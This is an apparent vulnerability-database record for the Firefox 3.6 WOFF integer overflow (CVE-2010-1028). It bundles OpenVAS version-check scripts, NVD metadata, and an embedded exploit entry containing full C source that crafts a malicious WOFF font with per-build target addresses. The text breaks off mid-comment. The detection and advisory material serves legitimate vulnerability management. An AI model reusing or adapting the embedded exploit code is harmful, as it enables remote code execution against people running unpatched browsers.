ID OPENVAS:67137 Type openvas Reporter Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com Modified 2017-02-09T00:00:00
Description
The remote host is missing an update to the system
as announced in the referenced advisory.
#
#VID 5d5ed535-3653-11df-9edc-000f20797ede
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from VID 5d5ed535-3653-11df-9edc-000f20797ede
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_insight = "The following package is affected: firefox
CVE-2010-1028
Integer overflow in the decompression functionality in the Web Open
Fonts Format (WOFF) decoder in Mozilla Firefox 3.6 before 3.6.2 and
3.7 before 3.7 alpha 3 allows remote attackers to execute arbitrary
code via a crafted WOFF file that triggers a buffer overflow, as
demonstrated by the vd_ff module in VulnDisco 9.0.";
tag_solution = "Update your system with the appropriate patches or
software upgrades.
http://www.mozilla.org/security/announce/2010/mfsa2010-08.html
http://www.vuxml.org/freebsd/5d5ed535-3653-11df-9edc-000f20797ede.html";
tag_summary = "The remote host is missing an update to the system
as announced in the referenced advisory.";
if(description)
{
script_id(67137);
script_version("$Revision: 5245 $");
script_tag(name:"last_modification", value:"$Date: 2017-02-09 09:57:08 +0100 (Thu, 09 Feb 2017) $");
script_tag(name:"creation_date", value:"2010-03-30 18:37:46 +0200 (Tue, 30 Mar 2010)");
script_cve_id("CVE-2010-1028");
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_name("FreeBSD Ports: firefox");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com");
script_family("FreeBSD Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/freebsdrel", "login/SSH/success");
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-bsd.inc");
txt = "";
vuln = 0;
bver = portver(pkg:"firefox");
if(!isnull(bver) && revcomp(a:bver, b:"3.6,1")>0 && revcomp(a:bver, b:"3.6.2,1")<0) {
txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\n';
vuln = 1;
}
if(vuln) {
security_message(data:string(txt));
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:67137", "type": "openvas", "bulletinFamily": "scanner", "title": "FreeBSD Ports: firefox", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2010-03-30T00:00:00", "modified": "2017-02-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=67137", "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2010-1028"], "lastseen": "2017-07-02T21:09:57", "viewCount": 3, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2017-07-02T21:09:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1028"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121000", "OPENVAS:902027", "OPENVAS:1361412562310902027", "OPENVAS:1361412562310830981", "OPENVAS:1361412562310831006", "OPENVAS:136141256231067137", "OPENVAS:830981", "OPENVAS:831006"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201301-01.NASL", "REDHAT-RHSA-2010-0500.NASL", "ORACLELINUX_ELSA-2010-0501.NASL", "MOZILLA_FIREFOX_362.NASL", "CENTOS_RHSA-2010-0501.NASL", "MANDRIVA_MDVSA-2010-070.NASL", "REDHAT-RHSA-2010-0501.NASL", "FREEBSD_PKG_5D5ED535365311DF9EDC000F20797EDE.NASL", "ORACLELINUX_ELSA-2010-0500.NASL", "CENTOS_RHSA-2010-0500.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23547", "SECURITYVULNS:VULN:10745", "SECURITYVULNS:DOC:29712"]}, {"type": "zdt", "idList": ["1337DAY-ID-21132"]}, {"type": "freebsd", "idList": ["5D5ED535-3653-11DF-9EDC-000F20797EDE"]}, {"type": "zdi", "idList": ["ZDI-10-064"]}, {"type": "seebug", "idList": ["SSV:19337"]}, {"type": "cert", "idList": ["VU:964549"]}, {"type": "gentoo", "idList": ["GLSA-201301-01"]}], "modified": "2017-07-02T21:09:57", "rev": 2}, "vulnersScore": 8.4}, "pluginID": "67137", "sourceData": "#\n#VID 5d5ed535-3653-11df-9edc-000f20797ede\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 5d5ed535-3653-11df-9edc-000f20797ede\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: firefox\n\nCVE-2010-1028\nInteger overflow in the decompression functionality in the Web Open\nFonts Format (WOFF) decoder in Mozilla Firefox 3.6 before 3.6.2 and\n3.7 before 3.7 alpha 3 allows remote attackers to execute arbitrary\ncode via a crafted WOFF file that triggers a buffer overflow, as\ndemonstrated by the vd_ff module in VulnDisco 9.0.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-08.html\nhttp://www.vuxml.org/freebsd/5d5ed535-3653-11df-9edc-000f20797ede.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(67137);\n script_version(\"$Revision: 5245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-09 09:57:08 +0100 (Thu, 09 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-30 18:37:46 +0200 (Tue, 30 Mar 2010)\");\n script_cve_id(\"CVE-2010-1028\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: firefox\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6,1\")>0 && revcomp(a:bver, b:\"3.6.2,1\")<0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "FreeBSD Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T05:44:56", "description": "Integer overflow in the decompression functionality in the Web Open Fonts Format (WOFF) decoder in Mozilla Firefox 3.6 before 3.6.2 and 3.7 before 3.7 alpha 3 allows remote attackers to execute arbitrary code via a crafted WOFF file that triggers a buffer overflow, as demonstrated by the vd_ff module in VulnDisco 9.0.", "edition": 4, "cvss3": {}, "published": "2010-03-19T21:30:00", "title": "CVE-2010-1028", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1028"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:firefox:3.6.1", "cpe:/a:mozilla:firefox:3.7"], "id": "CVE-2010-1028", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1028", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.7:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.6:a1_pre:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.7:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.7:a1_pre:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-08T11:39:32", "description": "This exploit leverages WOFF heap corruption due to an integer overflow in Mozilla Firefox versions 3.6, 3.6 Beta 1, 3, 4, and 5, 3.6 RC1 and RC2.", "edition": 2, "published": "2013-08-19T00:00:00", "type": "zdt", "title": "Mozilla Firefox 3.6 - Integer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1028"], "modified": "2013-08-19T00:00:00", "id": "1337DAY-ID-21132", "href": "https://0day.today/exploit/description/21132", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <zlib.h>\r\n \r\n/*\r\n x90c WOFF 1day exploit\r\n \r\n (MFSA2010-08 WOFF Heap Corruption due to Integer Overflow 1day exploit)\r\n \r\n CVE-ID: CVE-2010-1028\r\n \r\n Full Exploit: http:/www.exploit-db.com/sploits/27698.tgz\r\n \r\n Affacted Products:\r\n - Mozilla Firefox 3.6 ( Gecko 1.9.2 )\r\n - Mozilla Firefox 3.6 Beta1, 3, 4, 5 ( Beta2 ko not released )\r\n - Mozilla Firefox 3.6 RC1, RC2\r\n \r\n Fixed in:\r\n - Mozilla Firefox 3.6.2 ( after 3.6 version this bug fixed )\r\n \r\n security bug credit: Evgeny Legerov < intevydis.com >\r\n \r\n Timeline:\r\n 2010.02.01 - Evengy Legerov Initial discovered and shiped it into\r\n \"Immunity 3rd Party Product VulnDisco 9.0\"\r\n https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/\r\n 2010.02.18 - without reporter, it self analyzed\r\n and contact to mozilla and secunia before advisory reporting\r\n http://secunia.com/advisories/38608\r\n 2010.03.19 - CVE registered\r\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1028\r\n 2010.03.22 - Mozilla advisory report\r\n http://www.mozilla.org/security/announce/2010/mfsa2010-08.html\r\n 2010.04.01 - x90c exploit (x90c.org)\r\n \r\n Compile:\r\n [[email\u00a0protected] woff]# gcc CVE-2010-1028_exploit.c -o CVE-2010-1028_exploit -lz\r\n \r\n \r\n rebel: greets to my old l33t hacker dude in sweden\r\n ... BSDaemon: and Invitation of l33t dude for exploit share\r\n #[email\u00a0protected], #[email\u00a0protected]\r\n \r\n \r\n x90c\r\n \r\n*/\r\n \r\ntypedef unsigned int UInt32;\r\ntypedef unsigned short UInt16;\r\n \r\n/*\r\n for above two types, some WOFF header struct uses big-endian byte order.\r\n*/\r\n \r\ntypedef struct\r\n{\r\n UInt32 signature;\r\n UInt32 flavor;\r\n UInt32 length;\r\n UInt16 numTables;\r\n UInt16 reserved;\r\n UInt32 totalSfntSize;\r\n UInt16 majorVersion;\r\n UInt16 minorVersion;\r\n UInt32 metaOffset;\r\n UInt32 metaLength;\r\n UInt32 metaOrigLength;\r\n UInt32 privOffset;\r\n UInt32 privLength;\r\n} WOFF_HEADER; \r\n \r\ntypedef struct\r\n{\r\n UInt32 tag;\r\n UInt32 offset;\r\n UInt32 compLength;\r\n UInt32 origLength;\r\n UInt32 origChecksum;\r\n} WOFF_DIRECTORY;\r\n \r\n#define FLAVOR_TRUETYPE_FONT 0x0001000\r\n#define FLAVOR_CFF_FONT 0x4F54544F\r\n \r\nstruct ff_version\r\n{\r\n int num;\r\n char *v_nm;\r\n unsigned long addr;\r\n};\r\n \r\nstruct ff_version plat[] =\r\n{\r\n{\r\n 0, \"Win XP SP3 ko - FF 3.6\", 0x004E18ED\r\n},\r\n{\r\n 1, \"Win XP SP3 ko - FF 3.6 Beta1\", 0x004E17BD\r\n},\r\n{\r\n 2, \"Win XP SP3 ko - FF 3.6 Beta3\", 0x004E193D\r\n},\r\n{\r\n 3, \"Win XP SP3 ko - FF 3.6 Beta4\", 0x004E20FD\r\n},\r\n{\r\n 4, \"Win XP SP3 ko - FF 3.6 Beta5\", 0x600A225D\r\n},\r\n{\r\n 5, \"Win XP SP3 ko - FF 3.6 RC1\", 0x004E17BD\r\n},\r\n{\r\n 6, \"Win XP SP3 ko - FF 3.6 RC2\", 0x004E18ED\r\n},\r\n{\r\n 0x00, NULL, 0x0\r\n}\r\n};\r\n \r\nvoid usage(char *f_nm)\r\n{\r\n int i = 0;\r\n \r\n fprintf(stdout, \"\\n Usage: %s [Target ID]\\n\\n\", f_nm);\r\n \r\n for(i = 0; plat[i].v_nm != NULL; i++)\r\n fprintf(stdout, \"\\t{%d} %s. \\n\", (plat[i].num), (plat[i].v_nm));\r\n \r\n exit(-1);\r\n}\r\n \r\nint main(int argc, char *argv[]) {\r\n WOFF_HEADER woff_header;\r\n WOFF_DIRECTORY woff_dir[1];\r\n FILE *fp;\r\n char dataBlock[1024];\r\n char compressed_dataBlock[1024];\r\n char de_buf[1024];\r\n int total_bytes = 0, total_dataBlock = 0; \r\n unsigned long destLen = 1024;\r\n unsigned long de_Len = 1024;\r\n unsigned long i = 0;\r\n unsigned long addr_saved_ret_val = 0;\r\n int ret = 0;\r\n int n = 0;\r\n \r\n if(argc < 2)\r\n usage(argv[0]);\r\n \r\n n = atoi(argv[1]);\r\n \r\n if(n < 0 || n > 6)\r\n {\r\n fprintf(stderr, \"\\nTarget number range is 0-6!\\n\");\r\n usage(argv[0]);\r\n }\r\n \r\n printf(\"\\n#### x90c WOFF exploit ####\\n\");\r\n printf(\"\\nTarget: %d - %s\\n\\n\", (plat[n].num), (plat[n].v_nm));\r\n \r\n // WOFF HEADER\r\n woff_header.signature = 0x46464F77; // 'wOFF' ( L.E )\r\n woff_header.flavor = FLAVOR_TRUETYPE_FONT; // sfnt version ( B.E )\r\n woff_header.length = 0x00000000; // woff file total length ( B.E )\r\n woff_header.numTables = 0x0100; // 0x1 - woff dir entry length ( B.E )\r\n woff_header.reserved = 0x0000; // res bit ( all zero )\r\n \r\n // totalSFntSize value will bypass validation condition after integer overflow\r\n woff_header.totalSfntSize = 0x1C000000; // 0x0000001C ( B.E )\r\n woff_header.majorVersion = 0x0000; // major version\r\n woff_header.minorVersion = 0x0000; // minor version\r\n woff_header.metaOffset = 0x00000000; // meta data block offset ( not used )\r\n woff_header.metaLength = 0x00000000; // meta data block length ( not used )\r\n woff_header.metaOrigLength = 0x00000000; // meta data block before-compresed length ( not used )\r\n woff_header.privOffset = 0x00000000; // Private data block offset ( not used )\r\n woff_header.privLength = 0x00000000; // Private data block length\r\n \r\n woff_dir[0].tag = 0x54444245; // 'EBDT' ( B.E )\r\n woff_dir[0].offset = 0x40000000; // 0x00000040 ( B.E )\r\n woff_dir[0].compLength = 0x00000000; // ( B.E )\r\n \r\n // to trigger field bit.\r\n // 0xFFFFFFF8-0xFFFFFFFF value to trigger integer overflow.\r\n // 1) calculation result is 0, it's bypass to sanityCheck() function\r\n // 2) passed very long length into zlib Decompressor, it's trigger memory corruption!\r\n \r\n // 0xFFFFFFFD-0xFFFFFFFF: bypass sanityCheck()\r\n // you can use only the value of 0xFFFFFFFF ( integer overflow!!! )\r\n // you can't using other values to bypass validation condition\r\n woff_dir[0].origLength = 0xFFFFFFFF; // 0xFFFFFFFF ( B.E )\r\n \r\n printf(\"WOFF_HEADER [ %d bytes ]\\n\", sizeof(WOFF_HEADER));\r\n printf(\"WOFF_DIRECTORY [ %d bytes ]\\n\", sizeof(WOFF_DIRECTORY));\r\n \r\n // to compress data block\r\n // [ 0x0c0c0c0c 0x0c0c0c0c 0x0c0c0c0c ... ]\r\n // ...JIT spray stuff...\r\n \r\n addr_saved_ret_val = plat[n].addr;\r\n addr_saved_ret_val += 0x8; // If add 8bytes it reduced reference error occurs\r\n \r\n for(i = 0; i < sizeof(dataBlock); i+=4) // 0x004E18F5\r\n {\r\n dataBlock[i+0] = (addr_saved_ret_val & 0x000000ff);\r\n dataBlock[i+1] = (addr_saved_ret_val & 0x0000ff00) >> 8;\r\n dataBlock[i+2] = (addr_saved_ret_val & 0x00ff0000) >> 16;\r\n dataBlock[i+3] = (addr_saved_ret_val & 0xff000000) >> 24;\r\n }\r\n \r\n // compress dataBlock with zlib's compress()\r\n if(compress((Bytef *)compressed_dataBlock,\r\n (uLongf *)&destLen,\r\n (Bytef *)dataBlock,\r\n (uLong)(sizeof(dataBlock))\r\n ) != Z_OK)\r\n {\r\n fprintf(stderr, \"Zlib compress failed!\\n\");\r\n exit(-1);\r\n }\r\n \r\n printf(\"\\nZlib compress(dataBlock) ...\\n\");\r\n printf(\"DataBlock [ %u bytes ]\\n\", sizeof(dataBlock));\r\n printf(\"Compressed DataBlock [ %u bytes ]\\n\", destLen);\r\n printf(\"[ Z_OK ]\\n\\n\");\r\n \r\n total_bytes = sizeof(WOFF_HEADER) +\r\n sizeof(WOFF_DIRECTORY) +\r\n destLen;\r\n \r\n total_dataBlock = destLen;\r\n \r\n printf(\"Total WOFF File Size: %d bytes\\n\", total_bytes);\r\n \r\n // byte order change to total_bytes, total_dataBlock ( L.E into B.E )\r\n total_bytes =\r\n ((total_bytes & 0xff000000) >> 24) |\r\n ((total_bytes & 0x00ff0000) >> 8) |\r\n ((total_bytes & 0x0000ff00) << 8) |\r\n ((total_bytes & 0x000000ff) << 24);\r\n woff_header.length = total_bytes;\r\n \r\n total_dataBlock =\r\n ((total_dataBlock & 0xff000000) >> 24) |\r\n ((total_dataBlock & 0x00ff0000) >> 8) |\r\n ((total_dataBlock & 0x0000ff00) << 8) |\r\n ((total_dataBlock & 0x000000ff) << 24);\r\n \r\n woff_dir[0].compLength = total_dataBlock;\r\n \r\n // create attack code data\r\n if((fp = fopen(\"s.woff\", \"wb\")) < 0)\r\n {\r\n fprintf(stderr, \"that file to create open failed\\n\");\r\n exit(-2);\r\n }\r\n \r\n // setup WOFF data store\r\n fwrite(&woff_header, 1, sizeof(woff_header), fp);\r\n fwrite(&woff_dir[0], 1, sizeof(woff_dir[0]), fp);\r\n fwrite(&compressed_dataBlock, 1, destLen, fp);\r\n \r\n fclose(fp);\r\n \r\n // zlib extract test\r\n ret = uncompress(de_buf, &de_Len, compressed_dataBlock, destLen);\r\n if(ret != Z_OK)\r\n {\r\n switch(ret)\r\n {\r\n case Z_MEM_ERROR:\r\n printf(\"Z_MEM_ERROR\\n\"); \r\n break;\r\n case Z_BUF_ERROR:\r\n printf(\"Z_BUF_ERROR\\n\");\r\n break;\r\n case Z_DATA_ERROR:\r\n printf(\"Z_DATA_ERROR\\n\");\r\n break;\r\n }\r\n \r\n fprintf(stderr, \"Zlib uncompress test failed!\\n\");\r\n unlink(\"./s.woff\");\r\n exit(-3);\r\n }\r\n \r\n printf(\"\\nZlib uncompress test(compressed_dataBlock) ...\\n\");\r\n printf(\"[ Z_OK ]\\n\\n\");\r\n \r\n return 0;\r\n}\r\n \r\n/* eof */\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21132"}], "openvas": [{"lastseen": "2018-01-19T15:04:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1028"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-01-19T00:00:00", "published": "2010-03-30T00:00:00", "id": "OPENVAS:136141256231067137", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067137", "type": "openvas", "title": "FreeBSD Ports: firefox", "sourceData": "#\n#VID 5d5ed535-3653-11df-9edc-000f20797ede\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 5d5ed535-3653-11df-9edc-000f20797ede\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: firefox\n\nCVE-2010-1028\nInteger overflow in the decompression functionality in the Web Open\nFonts Format (WOFF) decoder in Mozilla Firefox 3.6 before 3.6.2 and\n3.7 before 3.7 alpha 3 allows remote attackers to execute arbitrary\ncode via a crafted WOFF file that triggers a buffer overflow, as\ndemonstrated by the vd_ff module in VulnDisco 9.0.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-08.html\nhttp://www.vuxml.org/freebsd/5d5ed535-3653-11df-9edc-000f20797ede.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67137\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-30 18:37:46 +0200 (Tue, 30 Mar 2010)\");\n script_cve_id(\"CVE-2010-1028\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: firefox\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6,1\")>0 && revcomp(a:bver, b:\"3.6.2,1\")<0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-27T19:23:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1028"], "description": "The host is running Mozilla Firefox and is prone to unspecified\n vulnerability.", "modified": "2020-04-23T00:00:00", "published": "2010-03-23T00:00:00", "id": "OPENVAS:1361412562310902027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902027", "type": "openvas", "title": "Mozilla Firefox Unspecified Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Unspecified Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902027\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-03-23 15:59:14 +0100 (Tue, 23 Mar 2010)\");\n script_cve_id(\"CVE-2010-1028\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mozilla Firefox Unspecified Vulnerability (Windows)\");\n\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow the attackers to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Mozilla Firefox 3.6 and prior\");\n script_tag(name:\"insight\", value:\"The flaw is caused by unspecified errors and unknown attack vectors.\");\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 3.6.3 or later\");\n script_tag(name:\"summary\", value:\"The host is running Mozilla Firefox and is prone to unspecified\n vulnerability.\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/38608\");\n script_xref(name:\"URL\", value:\"http://www.h-online.com/security/news/item/Zero-day-exploit-for-Firefox-3-6-936124.html\");\n script_xref(name:\"URL\", value:\"http://blog.psi2.de/en/2010/02/20/going-commercial-with-firefox-vulnerabilities/comment-page-1/#comment-666\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/firefox/upgrade.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nfoxVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!foxVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:foxVer, test_version:\"3.6\")){\n report = report_fixed_ver(installed_version:foxVer, vulnerable_range:\"Less than or equal to 3.6\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1028"], "description": "The host is running Mozilla Firefox and is prone to unspecified\n vulnerability.", "modified": "2017-02-22T00:00:00", "published": "2010-03-23T00:00:00", "id": "OPENVAS:902027", "href": "http://plugins.openvas.org/nasl.php?oid=902027", "type": "openvas", "title": "Mozilla Firefox Unspecified Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_firefox_unspecified_vuln.nasl 5394 2017-02-22 09:22:42Z teissa $\n#\n# Mozilla Firefox Unspecified Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it 